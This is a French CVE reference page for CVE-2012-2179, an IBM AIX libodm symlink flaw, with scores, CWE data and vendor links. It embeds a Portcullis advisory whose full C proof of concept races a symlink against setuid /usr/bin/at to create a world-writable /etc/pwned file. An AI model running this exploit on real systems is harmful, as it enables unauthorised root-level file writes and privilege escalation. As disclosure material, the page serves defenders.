CVE-2012-2179 : Détail

CVE-2012-2179

A01-Broken Access Control
0.04%V3
Local
2012-06-22
08h00 +00:00
2017-08-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

libodm.a in IBM AIX 5.3, 6.1, and 7.1 allows local users to overwrite arbitrary files via a symlink attack on a temporary file.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-264 Category : Permissions, Privileges, and Access Controls
Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.9 AV:L/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 33725

Date de publication : 2014-06-11 22h00 +00:00
Auteur : Portcullis
EDB Vérifié : Yes

Vulnerability title: Privilege Escalation in IBM AIX CVE: CVE-2014-3977 Vendor: IBM Product: AIX Affected version: 6.1.8 and later Fixed version: N/A Reported by: Tim Brown Details: It has been identified that libodm allows privilege escalation via arbitrary file writes with elevated privileges (utilising SetGID and SetUID programs). The following will cause a new file /etc/pwned to be created with permissions of rw-rw-rw: #include <stdlib.h> #include <unistd.h> #include <stdio.h> int pwnedflag; int main(int argc, char **argv) { pwnedflag = 0; umask(0); if (fork()) { setenv("ODMERR", "1", 1); while (!pwnedflag) { if (!access("/etc/pwned", F_OK)) { pwnedflag = 1; printf("Race won...\r\n"); unsetenv("ODMERR"); exit(EXIT_SUCCESS); } system("/usr/bin/at"); } } else { while (!pwnedflag) { symlink("/etc/pwned", "ODMTRACE0"); if (!access("/etc/pwned", F_OK)) { pwnedflag = 1; printf("Race won...\r\n"); exit(EXIT_SUCCESS); } unlink("ODMTRACE0"); } } } It is believed this is a side affect of CVE-2012-2179 being incorrectly resolved. As understood, prior to CVE-2012-2179 being fixed, libodm would simply open ODMTRACE0 and write to it assuming ODMERR=1. It is believed that the fix that was applied was to check for the presence of ODMTRACE0 and increment until no file was found. It is necessary to win a time of check, time of use race condition by creating a symlink from the ODMTRACE0 in the current working directory to the target file under hoping that the link will be added after the check has been made that ODMTRACE0 does not exist. Further details at: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3977/ Copyright: Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

Products Mentioned

Configuraton 0

Ibm>>Aix >> Version 5.3

Ibm>>Aix >> Version 6.1

Ibm>>Aix >> Version 7.1

Références

http://www.ibm.com/support/docview.wss?uid=isg1IV21382
Tags : vendor-advisory, x_refsource_AIXAPAR
http://www.securitytracker.com/id?1027193
Tags : vdb-entry, x_refsource_SECTRACK
http://www.ibm.com/support/docview.wss?uid=isg1IV21381
Tags : vendor-advisory, x_refsource_AIXAPAR
http://www.ibm.com/support/docview.wss?uid=isg1IV21379
Tags : vendor-advisory, x_refsource_AIXAPAR
http://www.ibm.com/support/docview.wss?uid=isg1IV21383
Tags : vendor-advisory, x_refsource_AIXAPAR
http://www.ibm.com/support/docview.wss?uid=isg1IV22019
Tags : vendor-advisory, x_refsource_AIXAPAR
http://www.osvdb.org/83133
Tags : vdb-entry, x_refsource_OSVDB